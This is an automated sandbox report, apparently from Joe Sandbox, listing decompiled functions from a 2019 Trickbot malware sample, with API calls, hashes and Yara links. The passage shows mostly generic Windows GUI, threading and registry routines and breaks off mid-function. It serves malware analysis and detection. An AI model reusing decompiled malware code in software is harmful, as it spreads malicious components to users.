Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: c43e7f65b255fe09af5dfe8524a847ad5792f8efa6daaa39650c61b61675290f
Instruction ID: ff16c03e2ec7b37d8fe5a6e6ffefd06e949a7afc9839335ea91b85b0424e468b
Opcode Fuzzy Hash: c43e7f65b255fe09af5dfe8524a847ad5792f8efa6daaa39650c61b61675290f
Instruction Fuzzy Hash: 25F0A971A003027B99205B6AACC9C1F769CEAE9744751E42FF515C2621C678DC529B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00430C9B, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430C9B(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x00430c9f
0x00430cac
0x00430cfc
0x00430d05
0x00430d0e
0x00430d14
0x00430d17
0x00000000
0x00430d17
0x00430ccd
0x00430ce7
0x00000000

APIs

IsWindow.USER32(?), ref: 00430CA4
SendMessageA.USER32(?,00000420,00000000,?), ref: 00430CCD
SendMessageA.USER32(?,0000041F,00000000,?), ref: 00430CE7
InvalidateRect.USER32(?,00000000,00000001), ref: 00430CF0

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 3472c5ca7fb7b38a62a5d195244dba493fff3856a186633848bcdb42b95be8be
Instruction ID: 00905af7312be1af4dad6bc9954392fbbc00918f51df730e5a65d5fe8a517435
Opcode Fuzzy Hash: 3472c5ca7fb7b38a62a5d195244dba493fff3856a186633848bcdb42b95be8be
Instruction Fuzzy Hash: 46011E71240718AFEB208F29DC05BAABBF4FB44750F10852AF996D6290D7B1EC51DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00410E70, Relevance: 6.0, APIs: 4, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410E70() {
				signed int _t15;
				intOrPtr _t17;
				void* _t21;
				long _t22;
				void* _t25;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;

				_t30 = 0;
				_t22 = GetCurrentThreadId();
				EnterCriticalSection(0x44d320);
				_t32 =  *0x44d39c - _t30; // 0x0
				if(_t32 > 0) {
					do {
						_t15 = _t30 * 4;
						_t28 = _t15 + _t15 * 4;
						if( *((intOrPtr*)(_t15 + 0x44d3a4 + _t15 * 4)) == _t22) {
							_t17 =  *((intOrPtr*)(_t28 + 0x44d3ac)) - 1;
							 *((intOrPtr*)(_t28 + 0x44d3ac)) = _t17;
							if(_t17 == 0) {
								UnhookWindowsHookEx( *(_t28 + 0x44d3a8));
								 *0x44d39c =  *0x44d39c - 1;
								_t35 = _t30 -  *0x44d39c; // 0x0
								if(_t35 < 0) {
									_t25 = _t28 + 0x44d3a0;
									do {
										_t30 = _t30 + 1;
										_t21 = memcpy(_t25, _t25 + 0x14, 5 << 2);
										_t31 = _t31 + 0xc;
										_t25 = _t21;
										_t36 = _t30 -  *0x44d39c; // 0x0
									} while (_t36 < 0);
								}
							}
						}
						_t30 = _t30 + 1;
						_t37 = _t30 -  *0x44d39c; // 0x0
					} while (_t37 < 0);
				}
				LeaveCriticalSection(0x44d320);
				return 1;
			}

0x00410e74
0x00410e7c
0x00410e83
0x00410e89
0x00410e8f
0x00410e91
0x00410e91
0x00410e9f
0x00410ea2
0x00410eaa
0x00410eab
0x00410eb1
0x00410eba
0x00410ec0
0x00410ec6
0x00410ecc
0x00410ece
0x00410ed4
0x00410ede
0x00410edf
0x00410edf
0x00410ee1
0x00410ee3
0x00410ee3
0x00410ed4
0x00410ecc
0x00410eb1
0x00410eeb
0x00410eec
0x00410eec
0x00410e91
0x00410ef9
0x00410f08

APIs

GetCurrentThreadId.KERNEL32 ref: 00410E76
EnterCriticalSection.KERNEL32(0044D320), ref: 00410E83
UnhookWindowsHookEx.USER32(?), ref: 00410EBA
LeaveCriticalSection.KERNEL32(0044D320), ref: 00410EF9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 09f640ac9d721502e12a1ab7d4228548e4b6e44c66c57203f14034ed05055ba9
Instruction ID: 05701a805504fdb9522cbdc0e1ec849b74c08f6d37fdd3284411a8a46cdee228
Opcode Fuzzy Hash: 09f640ac9d721502e12a1ab7d4228548e4b6e44c66c57203f14034ed05055ba9
Instruction Fuzzy Hash: B5017575B007089FC720EF56E8846AB77E5E741711F40047AED1A83610D7B56C95CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004312E3, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004312E3(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E00429BAB(__ecx, _t19, _a8);
				_t12 = E0041B66F(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x004312ea
0x004312ee
0x004312f4
0x004312fb
0x00431303
0x0043130f
0x00431317
0x00431329
0x00431337
0x00431345
0x0043134a
0x00000000
0x0043134a
0x00431317
0x00431350

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

GetParent.USER32(?), ref: 00431308
IsZoomed.USER32(00000000), ref: 0043130F
GetSystemMetrics.USER32(00000005), ref: 00431337
GetSystemMetrics.USER32(00000002), ref: 00431345

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: cdd9b4a6679746e42091af103d6e83093ab396ed2c7c6f27681289a0ab75cc92
Instruction ID: 5ffa13b25bbda1396c8b4ac149ef4e9d87dd7c3793bdd7ec6dc063a98998610b
Opcode Fuzzy Hash: cdd9b4a6679746e42091af103d6e83093ab396ed2c7c6f27681289a0ab75cc92
Instruction Fuzzy Hash: 7201F932600214ABDF106FB8DC49F9EBB78EF54740F014129FB51AB291DBB4AC01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00428804, Relevance: 6.0, APIs: 4, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428804(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, "%d", _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E0043201B(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}

0x0042880b
0x00428811
0x00428855
0x00000000
0x0042886e
0x00428816
0x0042881b
0x0042881f
0x00428830
0x00428839
0x00000000
0x00428846
0x00428876

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 00428830
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00428839
wsprintfA.USER32 ref: 00428855
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042886E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: 59c2b3b50b47d1f2405115da46d4e261837adb768674886530d7b0bcea34e14e
Instruction ID: 099bac61d737788e6343fa5323b843f7a9a3863b745646880d7b6d625d952176
Opcode Fuzzy Hash: 59c2b3b50b47d1f2405115da46d4e261837adb768674886530d7b0bcea34e14e
Instruction Fuzzy Hash: C301A232500625BBCB115F64DC05FAF37B8BF08714F44442AFA11A61A0EBB5D911CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004302BA, Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004302BA(void* __ecx) {
				void* __esi;
				void* _t16;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				E00405340(E004387BC, _t30);
				_push(__ecx);
				_push(__ecx);
				_t34 =  *0x44b35c; // 0x1
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_t28 = __ecx;
				if(_t34 == 0) {
					 *((intOrPtr*)(_t30 - 4)) = 0;
					if( *(_t30 + 0xc) != 0) {
						lstrcpyA(E0041826E(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
					} else {
						E00417E53(__ecx + 0xc8, __ecx);
					}
					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
					_t16 = 1;
				} else {
					_t16 = E004187B4(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

0x004302bf
0x004302c4
0x004302c5
0x004302cb
0x004302d1
0x004302d4
0x004302d6
0x004302e2
0x004302e5
0x0043030d
0x004302e7
0x004302ed
0x004302ed
0x0043031d
0x00430325
0x004302d8
0x004302d8
0x004302d8
0x00430335
0x0043033e

APIs

__EH_prolog.LIBCMT ref: 004302BF
SendMessageA.USER32(?,00000085,00000000,00000000), ref: 0043031D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: aef2270c1aee9b4039f5e14badfada3e2e85be03f8a947770d27bea74b741efd
Instruction ID: 573d88748fd1d72ca91e911712e4e30091aa6effc525c16d676407f830b30020
Opcode Fuzzy Hash: aef2270c1aee9b4039f5e14badfada3e2e85be03f8a947770d27bea74b741efd
Instruction Fuzzy Hash: 62018F72400604EFD7219F52DC59AEFB7A9FB88710F10822FF45252190CBB85D41CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8E9, Relevance: 6.0, APIs: 4, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040F8E9(void* __ecx) {
				long _t1;
				long _t3;
				long _t8;
				void* _t9;

				_t1 =  *0x44bee8; // 0x2
				_t9 = __ecx;
				_t8 = 2;
				if(_t1 != _t8) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x44bee8 - 1;
							if( *0x44bee8 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x44bee8 - _t8; // 0x2
						if(__eflags != 0) {
							L12:
							return _t9;
						}
						L10:
						_push(0x44bed0);
						L11:
						EnterCriticalSection();
						goto L12;
					}
					_t3 = InterlockedExchange(0x44bee8, 1);
					__eflags = _t3;
					if(__eflags != 0) {
						__eflags = _t3 - _t8;
						if(_t3 == _t8) {
							 *0x44bee8 = _t8;
						}
						goto L7;
					}
					InitializeCriticalSection(0x44bed0);
					E00404AE0(__eflags, E0040F967);
					 *0x44bee8 = _t8;
					goto L10;
				}
				_push(0x44bed0);
				goto L11;
			}

0x0040f8e9
0x0040f8f3
0x0040f8f5
0x0040f8f8
0x0040f901
0x0040f908
0x0040f93f
0x0040f93f
0x0040f93f
0x0040f946
0x00000000
0x00000000
0x0040f94a
0x0040f94a
0x0040f952
0x0040f958
0x0040f961
0x0040f966
0x0040f966
0x0040f95a
0x0040f95a
0x0040f95b
0x0040f95b
0x00000000
0x0040f95b
0x0040f911
0x0040f917
0x0040f919
0x0040f935
0x0040f937
0x0040f939
0x0040f939
0x00000000
0x0040f937
0x0040f91c
0x0040f927
0x0040f92d
0x00000000
0x0040f92d
0x0040f8fa
0x00000000

APIs

InterlockedExchange.KERNEL32(0044BEE8,00000001), ref: 0040F911
InitializeCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F91C
EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 8a549a783b0bb216b936606e438711466d9fe96f821479e738c9d0bfb9e3a691
Instruction ID: 795af708f39f71223e7614aee95b49d8bd10359373c432963277ac9fc91390b1
Opcode Fuzzy Hash: 8a549a783b0bb216b936606e438711466d9fe96f821479e738c9d0bfb9e3a691
Instruction Fuzzy Hash: 90F081B6744201BAEA31DB556C89B973654E3C1B65F340037F601B15E0D7F88C86875D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAE3, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AAE3(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E004225BE(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

0x0041aaed
0x0041ab52
0x00000000
0x0041aaf5
0x0041aaf5
0x0041aafb
0x00000000
0x0041ab18
0x0041ab21
0x0041ab2d
0x0041ab33
0x0041ab39
0x0041ab3d
0x0041ab3d
0x0041ab47
0x0041ab4f
0x00000000
0x0041ab4f
0x0041aafb

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 0041AB21
SetBkColor.GDI32(00000000,00000000), ref: 0041AB2D
GetSysColor.USER32(00000008), ref: 0041AB3D
SetTextColor.GDI32(00000000,?), ref: 0041AB47

Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: a442c9f52ad4fd832de06cc88f32a30b3b4c86f5614825be2e99379fcbf38e4a
Instruction ID: 0b8f7dd1830b2ee0fd3cab244b261d724f8fe3eb4471e6e6c538c2cc244534fb
Opcode Fuzzy Hash: a442c9f52ad4fd832de06cc88f32a30b3b4c86f5614825be2e99379fcbf38e4a
Instruction Fuzzy Hash: 0B014F30506149ABEF215F54DC49AEB3B6AEB00350F144522FA02D51E0C778EDE4D65A

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCB8, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DCB8(void* __ecx, void* _a4) {
				int _v8;
				char _v268;
				void* __ebp;
				void* _t15;
				int _t19;
				intOrPtr* _t23;
				void* _t25;

				E0041884D(_t25, SetActiveWindow( *(__ecx + 0x1c)));
				_t19 = 0;
				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t15 = E00432562();
				_t23 =  *((intOrPtr*)(_t15 + 4));
				if(_v8 > 0) {
					do {
						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
						_t19 = _t19 + 1;
					} while (_t19 < _v8);
				}
				DragFinish(_a4);
				return _t15;
			}

0x0042dcce
0x0042dcd9
0x0042dce4
0x0042dce7
0x0042dcef
0x0042dcf2
0x0042dcf4
0x0042dd04
0x0042dd11
0x0042dd14
0x0042dd15
0x0042dcf4
0x0042dd1d
0x0042dd27

APIs

SetActiveWindow.USER32(?), ref: 0042DCC7
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 0042DCE2
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 0042DD04
DragFinish.SHELL32(?), ref: 0042DD1D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: ae08d12314bfff497061791b30ab91291e84b923f60e2ebda0019bcbf0ab56af
Instruction ID: 2c8943c3bdef9204189fe6f1fee0ecbf9399023cccd1dcb296840862c044332e
Opcode Fuzzy Hash: ae08d12314bfff497061791b30ab91291e84b923f60e2ebda0019bcbf0ab56af
Instruction Fuzzy Hash: F5016DB1904118BFDF01AFA5DD84DDE7BB8EF48358B10406AB555970A0CBB49E81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00436ED0, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436ED0(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E00436FD2(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}

0x00436ed9
0x00436ede
0x00436eeb
0x00436ef7
0x00436f02
0x00436f05
0x00436f13
0x00436f20
0x00000000
0x00436f31
0x00436f39

APIs

GetViewportOrgEx.GDI32(?,?), ref: 00436EEB

Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00436F13
GetWindowOrgEx.GDI32(?,?), ref: 00436F20
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00436F31

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: a6efadef3e84db6a1dc01d819cc56c8a56c80131aefc04b7682a5ce80d1d4dc3
Instruction ID: 40cbf02877ad5f5a84e969d5412a8ac077745f8ac71469ef7174bd3f7eb77b5e
Opcode Fuzzy Hash: a6efadef3e84db6a1dc01d819cc56c8a56c80131aefc04b7682a5ce80d1d4dc3
Instruction Fuzzy Hash: 0D01287190020AFBDF249B94DC49AEEBBB9FF08710F004469A556A21A0D771A950DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041A917, Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A917(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E0041B66F(__ecx) & 0x40000000) != 0) {
					L6:
					return E004187B4(_t12);
				}
				_t16 = E004041A9();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x0041a91a
0x0041a926
0x0041a96e
0x00000000
0x0041a970
0x0041a92d
0x0041a931
0x00000000
0x0041a954
0x0041a963
0x0041a96b
0x00000000
0x0041a96b

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

GetKeyState.USER32(00000010), ref: 0041A93B
GetKeyState.USER32(00000011), ref: 0041A944
GetKeyState.USER32(00000012), ref: 0041A94D
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041A963

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: ae9a96d039c370fb255dc1ab9ea2c87baf4394a04333a9a787e2216501a3ad5c
Instruction ID: 0a202738f2d38c9c9ff172e2079839d3ccfde75787ea1009fffee619023b8918
Opcode Fuzzy Hash: ae9a96d039c370fb255dc1ab9ea2c87baf4394a04333a9a787e2216501a3ad5c
Instruction Fuzzy Hash: 76F027F379134975E92036A21C42FDD01154F80BD4F06093BF741BE1D189E988E2427E

Uniqueness

Uniqueness Score: -1.00%

Function 00430191, Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00430191(intOrPtr* __eax, struct tagRECT* _a8, intOrPtr _a12) {
				int _t13;
				int _t14;
				void* _t17;
				signed int _t19;
				struct tagRECT* _t23;

				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_t19 = E0041B66F(_t17);
					if((_t19 & 0x00040600) == 0) {
						_push(GetSystemMetrics(6));
						_push(5);
					} else {
						_push(GetSystemMetrics(0x21));
						_push(0x20);
					}
					_t13 = GetSystemMetrics();
					_t23 = _a8;
					_t14 = InflateRect(_t23, _t13, ??);
					if((_t19 & 0x00c00000) != 0) {
						_t14 =  *0x44b72c; // 0x0
						_t23->top = _t23->top - _t14;
					}
				} else {
					_t14 = E0041A46A(_t17, _a8, _a12);
				}
				return _t14;
			}

0x00430194
0x00430197
0x004301ae
0x004301b6
0x004301d1
0x004301d2
0x004301b8
0x004301c2
0x004301c3
0x004301c3
0x004301d4
0x004301d6
0x004301dc
0x004301e9
0x004301eb
0x004301f0
0x004301f0
0x00430199
0x004301a1
0x004301a1
0x004301f4

APIs

GetSystemMetrics.USER32(00000021), ref: 004301C0
GetSystemMetrics.USER32(00000005), ref: 004301D4
InflateRect.USER32(?,00000000), ref: 004301DC

Part of subcall function 0041A46A: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 0041A48B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: b853817094825d14b773b59d43d83c6b2a2bf9dfd53105354ef664b19934a974
Instruction ID: 31ffdf55344c6a8bbc1aa784fb65bf090684f1584ed27cb9a2cd41510527f332
Opcode Fuzzy Hash: b853817094825d14b773b59d43d83c6b2a2bf9dfd53105354ef664b19934a974
Instruction Fuzzy Hash: 3BF02433945310AFDB01AB649C15BBB7B68EF99720F09152BF51857190C6B59C10CBAF

Uniqueness

Uniqueness Score: -1.00%

Function 004218DE, Relevance: 6.0, APIs: 4, Instructions: 37
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E004218DE(intOrPtr __ecx) {
